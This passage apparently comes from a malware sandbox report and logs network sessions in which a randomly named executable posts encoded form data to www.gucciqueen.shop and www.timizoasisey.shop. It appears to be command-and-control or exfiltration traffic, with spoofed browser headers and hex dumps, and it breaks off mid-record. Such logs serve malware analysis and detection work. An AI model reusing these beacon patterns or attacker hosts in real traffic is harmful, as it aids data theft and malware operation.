Nov 1, 2024 03:48:16.587919950 CET	410	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 02:48:16 GMT Content-Type: text/html Content-Length: 270 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 6c 3d 2b 69 35 71 2b 75 7a 50 58 6d 66 74 79 5a 74 4e 5a 57 46 72 38 4d 43 37 59 6f 43 6d 76 79 42 74 33 6a 6a 58 2f 58 33 6f 52 4e 50 4a 37 30 65 4f 32 35 4e 30 77 34 7a 71 57 67 50 34 37 34 37 4f 70 56 58 73 49 68 6e 5a 76 37 6e 4d 6d 6a 65 58 49 53 42 74 6f 61 49 52 43 2f 65 30 30 4f 67 59 38 38 4c 2b 61 30 55 44 44 49 79 46 33 6b 71 31 42 53 4a 68 70 2f 6c 49 32 31 41 69 2b 51 41 36 55 51 3d 3d 26 64 62 4c 3d 64 38 57 58 5f 76 30 50 47 56 48 58 41 74 4b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nl=+i5q+uzPXmftyZtNZWFr8MC7YoCmvyBt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBtoaIRC/e00OgY88L+a0UDDIyF3kq1BSJhp/lI21Ai+QA6UQ==&dbL=d8WX_v0PGVHXAtK"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	50026	178.79.184.196	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:21.639082909 CET	723	OUT	POST /x3by/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.gucciqueen.shop Origin: http://www.gucciqueen.shop Referer: http://www.gucciqueen.shop/x3by/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 4c 6f 63 47 38 71 35 73 30 54 69 7a 4b 71 37 4b 77 31 50 30 56 38 69 6b 47 79 46 73 2f 5a 69 31 4d 57 38 4b 51 6d 63 31 43 36 31 37 56 51 50 38 31 63 5a 4c 33 51 4a 43 2b 47 42 55 65 76 43 32 53 62 63 66 75 44 45 7a 6c 54 38 56 66 6e 74 75 43 31 34 39 67 79 6a 32 2f 74 49 74 2f 61 5a 4a 32 69 4c 68 55 34 52 7a 4c 4c 6f 5a 4f 65 35 51 63 4b 75 30 2b 37 6b 44 37 62 33 59 6f 72 6d 56 34 72 63 46 46 49 6e 76 6a 55 47 46 6d 63 34 62 77 4a 35 42 4d 4a 38 72 44 6e 78 6f 76 50 69 35 7a 5a 52 6f 2b 52 30 6a 33 57 76 57 37 39 46 69 2f 52 79 45 4d 46 7a 31 49 73 59 64 42 34 36 6b 39 62 49 4e 70 57 49 3d Data Ascii: nl=LocG8q5s0TizKq7Kw1P0V8ikGyFs/Zi1MW8KQmc1C617VQP81cZL3QJC+GBUevC2SbcfuDEzlT8VfntuC149gyj2/tIt/aZJ2iLhU4RzLLoZOe5QcKu0+7kD7b3YormV4rcFFInvjUGFmc4bwJ5BMJ8rDnxovPi5zZRo+R0j3WvW79Fi/RyEMFz1IsYdB46k9bINpWI=
Nov 1, 2024 03:48:22.433681011 CET	461	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:48:22 GMT Server: Apache/2.4.62 (Debian) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50027	178.79.184.196	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:24.190325975 CET	743	OUT	POST /x3by/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.gucciqueen.shop Origin: http://www.gucciqueen.shop Referer: http://www.gucciqueen.shop/x3by/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 4c 6f 63 47 38 71 35 73 30 54 69 7a 4a 4f 2f 4b 6a 6d 58 30 43 4d 69 6e 4a 53 46 73 31 35 69 35 4d 58 41 4b 51 6e 70 71 42 49 52 37 55 31 72 38 32 64 5a 4c 6e 41 4a 43 30 6d 42 52 61 76 44 34 53 62 59 58 75 47 6b 7a 6c 53 63 56 66 69 52 75 44 47 51 79 76 43 6a 77 2b 64 49 56 79 36 5a 4a 32 69 4c 68 55 34 56 5a 4c 4c 77 5a 4f 4f 4a 51 64 72 75 31 69 72 6b 45 74 72 33 59 2b 62 6d 52 34 72 63 72 46 4a 37 42 6a 58 75 46 6d 64 49 62 7a 61 68 47 62 35 38 6c 65 58 77 57 68 4d 62 30 35 71 52 30 35 69 4e 32 68 56 50 32 33 72 30 49 6c 7a 36 73 66 6c 66 4e 59 2f 51 71 51 49 62 4e 6e 34 59 39 33 42 63 69 52 49 46 44 79 38 67 50 30 70 58 53 68 61 38 55 33 39 64 50 Data Ascii: nl=LocG8q5s0TizJO/KjmX0CMinJSFs15i5MXAKQnpqBIR7U1r82dZLnAJC0mBRavD4SbYXuGkzlScVfiRuDGQyvCjw+dIVy6ZJ2iLhU4VZLLwZOOJQdru1irkEtr3Y+bmR4rcrFJ7BjXuFmdIbzahGb58leXwWhMb05qR05iN2hVP23r0Ilz6sflfNY/QqQIbNn4Y93BciRIFDy8gP0pXSha8U39dP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50028	178.79.184.196	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:26.738183975 CET	1760	OUT	POST /x3by/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.gucciqueen.shop Origin: http://www.gucciqueen.shop Referer: http://www.gucciqueen.shop/x3by/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 4c 6f 63 47 38 71 35 73 30 54 69 7a 4a 4f 2f 4b 6a 6d 58 30 43 4d 69 6e 4a 53 46 73 31 35 69 35 4d 58 41 4b 51 6e 70 71 42 49 5a 37 56 47 54 38 30 2b 68 4c 6b 41 4a 43 34 47 42 51 61 76 43 6b 53 66 30 54 75 47 70 4d 6c 58 59 56 65 45 46 75 54 6e 51 79 34 53 6a 77 37 74 49 75 2f 61 5a 6d 32 69 62 6c 55 34 46 5a 4c 4c 77 5a 4f 49 74 51 55 61 75 31 67 72 6b 44 37 62 32 58 6f 72 6d 70 34 72 45 64 46 4a 50 2f 2f 33 4f 46 68 39 59 62 78 70 46 47 48 70 39 44 66 58 77 65 68 4e 6d 30 35 71 4e 34 35 6a 6f 2b 68 56 33 32 79 73 4e 4d 77 54 32 36 46 31 50 38 65 73 4a 4c 47 76 2f 73 36 71 46 4b 72 53 31 4e 4e 71 5a 50 30 34 59 5a 31 34 71 35 6a 50 41 58 2b 71 38 61 76 6d 67 6e 70 32 75 2f 54 44 53 53 5a 55 41 45 54 54 50 47 71 77 75 4e 55 4b 42 4b 7a 41 64 70 48 36 6f 45 56 54 33 54 54 66 33 6c 50 59 50 34 44 45 4d 72 59 7a 48 51 7a 78 78 56 49 6b 75 33 58 55 4c 44 63 4e 32 2b 33 6d 72 4a 4b 6b 6d 41 63 6c 66 4a 5a 4e 50 57 69 50 33 31 53 6c 43 33 78 32 50 32 42 74 75 39 62 57 34 57 68 5a 4e 34 4c 6f 4e [TRUNCATED] Data Ascii: nl=LocG8q5s0TizJO/KjmX0CMinJSFs15i5MXAKQnpqBIZ7VGT80+hLkAJC4GBQavCkSf0TuGpMlXYVeEFuTnQy4Sjw7tIu/aZm2iblU4FZLLwZOItQUau1grkD7b2Xormp4rEdFJP//3OFh9YbxpFGHp9DfXwehNm05qN45jo+hV32ysNMwT26F1P8esJLGv/s6qFKrS1NNqZP04YZ14q5jPAX+q8avmgnp2u/TDSSZUAETTPGqwuNUKBKzAdpH6oEVT3TTf3lPYP4DEMrYzHQzxxVIku3XULDcN2+3mrJKkmAclfJZNPWiP31SlC3x2P2Btu9bW4WhZN4LoNNCchAJetB12x7jKTEtFEE1QQlyiKGekWIL0IuoaNtf94PPmxjPgkGTE5vcBjakXz4zVpQb7ku8pRw5kF9BW7YnDfKGrXZiXS8Gyb0yh3biHK0fy/N3TFjlCI/nTaFWO5XOy8duJmyS2eY5NEOJKnxrd8L0tjJIzmJGn4uuIR0W1KUSr1G2tqhtVsyZIQdprCmtlivn/j9jzEfcGljzbrufsQuU571+zIuvKkm4f0imNRxyMUy/4jQwBrc6uoyYyX1mHDY+rYpzLrvpnV9A6weAngrzB9YcIBWFRjrDzkXsX9nLlrPMAmczOpjsjTHP5zNrkmw7NbkiBw3Mxmoh6h2otLFPr467FxdRejsEEMEWXBAbIBKqzNYBDhzGzuir5AgxcCaPal7PegQpevW0MW3h/DM2ymH5c+rOVxMDvFWnFgR5Z1Ef1pQSJuZK97DALZfLnsC8lX19kkyMIPdQGGTrWcTVOlYcBxldr2Y0hXnNVyxcboqZ69Wv7Q4LUGMPv++SG3JEECdEWaMA3puvDI5qELUEqD57VKL4fVrQe60bpBHOGtep6X2ykDyA3RWpZqWqeJ4p1pYw6vYONf2hcRW6Ed3WaeCKkyGCKiPuOCE2/MamyC+gFieJxV1hBfs2gAhsRScaN2HhxWjArdA6xNdnaJfPk2MjK2xo [TRUNCATED]
Nov 1, 2024 03:48:27.536863089 CET	461	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:48:27 GMT Server: Apache/2.4.62 (Debian) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	50029	178.79.184.196	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:29.286230087 CET	469	OUT	GET /x3by/?nl=Gq0m/cYr7UOoL/rfxlXcWcb0PFgu3v+6IQg5KkZ1GbFCfXnP9OdFnXsg+153ZunkN9E3pnQymCUHBFpvF3MPrj7bwNIl4rM9hQX9D40sB8Q0fvNSVLrWgvNkuIucpqHerw==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.gucciqueen.shop User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:48:30.082751989 CET	461	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:48:29 GMT Server: Apache/2.4.62 (Debian) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50030	188.114.96.3	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:43.334203005 CET	729	OUT	POST /3p0l/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.timizoasisey.shop Origin: http://www.timizoasisey.shop Referer: http://www.timizoasisey.shop/3p0l/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 31 4c 62 49 35 6a 46 49 6c 5a 70 73 44 57 47 51 2b 48 39 32 67 69 55 78 41 33 73 35 35 58 71 2f 45 6f 49 69 4b 71 56 46 71 49 4b 5a 70 31 68 4a 7a 36 62 5a 46 69 73 4c 37 56 37 72 44 64 4c 50 74 47 39 35 76 78 5a 6e 31 65 50 33 2b 6a 76 66 58 6b 47 77 43 30 35 37 73 4f 38 67 62 32 72 77 70 5a 6e 6e 6e 57 6a 68 6b 51 50 79 2b 42 53 73 30 4e 32 6f 4f 6c 6f 68 57 4f 79 76 4a 69 47 73 6c 57 77 4e 35 56 4a 47 35 64 2f 6f 79 4f 74 6e 56 52 51 54 49 6c 7a 36 39 48 45 31 55 48 38 43 62 35 43 47 66 4a 44 63 47 34 51 54 41 73 6d 70 56 34 78 62 6a 44 6d 42 7a 6a 52 56 62 4f 78 4b 4d 50 71 76 37 33 77 3d Data Ascii: nl=1LbI5jFIlZpsDWGQ+H92giUxA3s55Xq/EoIiKqVFqIKZp1hJz6bZFisL7V7rDdLPtG95vxZn1eP3+jvfXkGwC057sO8gb2rwpZnnnWjhkQPy+BSs0N2oOlohWOyvJiGslWwN5VJG5d/oyOtnVRQTIlz69HE1UH8Cb5CGfJDcG4QTAsmpV4xbjDmBzjRVbOxKMPqv73w=
Nov 1, 2024 03:48:44.206681013 CET	1057	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:48:44 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nQP044c%2FYz2go57gcWAkmUIcMsticY8ar5xze29XJ4Q9Yq11UqIQ8QXfkUYdeI0Nz9S2iBvxBQaMtgr4134pKtiO7sDzKn0UJKyZbd7oNb6WEhhrIBofk46u6JhqIcWINjRKuVDeeCg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db8914a1fe9477c-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1087&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 65 62 0d 0a 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: febTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	50031	188.114.96.3	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:45.875808954 CET	749	OUT	POST /3p0l/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.timizoasisey.shop Origin: http://www.timizoasisey.shop Referer: http://www.timizoasisey.shop/3p0l/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 31 4c 62 49 35 6a 46 49 6c 5a 70 73 53 46 4f 51 35 67 4a 32 77 79 55 32 45 48 73 35 79 33 71 7a 45 6f 55 69 4b 6f 35 56 71 2b 53 5a 71 52 74 4a 77 2b 76 5a 4c 43 73 4c 75 6c 37 75 64 74 4c 36 74 47 35 66 76 30 35 6e 31 65 62 33 2b 69 66 66 55 58 65 7a 43 6b 35 35 67 75 38 75 47 47 72 77 70 5a 6e 6e 6e 57 32 32 6b 51 58 79 2b 77 69 73 30 73 32 72 44 46 6f 6d 52 4f 79 76 4e 69 47 67 6c 57 77 37 35 58 78 34 35 66 48 6f 79 4d 31 6e 56 6b 38 51 44 6c 7a 38 35 48 45 6b 45 48 78 53 62 36 69 73 64 59 4f 67 56 49 59 39 49 36 58 44 50 61 35 7a 77 6a 4b 35 6a 77 5a 69 4b 2b 51 6a 57 73 36 66 6c 67 6b 45 59 65 37 74 45 6c 6c 36 6c 6e 52 79 45 68 46 62 76 2f 4d 6c Data Ascii: nl=1LbI5jFIlZpsSFOQ5gJ2wyU2EHs5y3qzEoUiKo5Vq+SZqRtJw+vZLCsLul7udtL6tG5fv05n1eb3+iffUXezCk55gu8uGGrwpZnnnW22kQXy+wis0s2rDFomROyvNiGglWw75Xx45fHoyM1nVk8QDlz85HEkEHxSb6isdYOgVIY9I6XDPa5zwjK5jwZiK+QjWs6flgkEYe7tEll6lnRyEhFbv/Ml
Nov 1, 2024 03:48:46.737658978 CET	1063	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:48:46 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HAzgZ%2FNkfoeXbUcL5Hj3M51E%2BbY%2BFZ7a5ahNuU3KAN%2BxMs0Y3cezIw51amdmQIhjMO8xRcjXO4QNV%2BB0uB%2FhQxqpOiLsh9bgcbxLhZPHWQasH74UeO%2B4O7gc%2FMGz9k7rUmjc%2FpAxnc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db89159f9bf2e17-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2150&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=749&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	50032	188.114.96.3	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:48:48.422061920 CET	1766	OUT	POST /3p0l/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.timizoasisey.shop Origin: http://www.timizoasisey.shop Referer: http://www.timizoasisey.shop/3p0l/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 31 4c 62 49 35 6a 46 49 6c 5a 70 73 53 46 4f 51 35 67 4a 32 77 79 55 32 45 48 73 35 79 33 71 7a 45 6f 55 69 4b 6f 35 56 71 2b 71 5a 71 6b 78 4a 79 66 76 5a 4b 43 73 4c 79 31 37 76 64 74 4c 64 74 43 64 62 76 30 6c 4e 31 64 6a 33 2f 41 58 66 44 57 65 7a 4e 6b 35 35 39 2b 38 76 62 32 71 79 70 5a 32 67 6e 57 6d 32 6b 51 58 79 2b 7a 36 73 79 39 32 72 42 46 6f 68 57 4f 79 7a 4a 69 47 45 6c 57 6f 72 35 58 30 4e 35 73 50 6f 78 73 6c 6e 58 32 45 51 4f 6c 7a 2b 2b 48 46 35 45 48 38 49 62 36 2b 4b 64 59 36 65 56 4b 49 39 4c 63 65 6c 4e 6f 70 48 69 41 79 6f 7a 33 42 48 55 4c 41 66 66 64 54 6c 76 78 41 51 64 64 44 54 46 77 31 61 68 58 73 47 51 33 31 71 68 4a 46 53 70 71 34 63 6f 64 4d 52 31 53 52 4b 70 62 68 49 33 44 30 64 7a 4c 7a 52 6d 55 50 56 70 55 51 76 2b 4b 78 38 38 79 46 57 39 48 53 59 67 77 51 51 58 53 56 71 7a 43 2b 46 78 46 69 65 48 34 53 2f 6a 5a 56 48 4b 6f 50 73 2b 74 4f 66 69 4e 44 41 57 56 72 65 6d 63 34 46 56 4c 4e 61 43 48 59 73 71 36 58 45 45 2f 4e 6b 72 4a 6d 6c 63 77 6e 59 36 50 5a [TRUNCATED] Data Ascii: 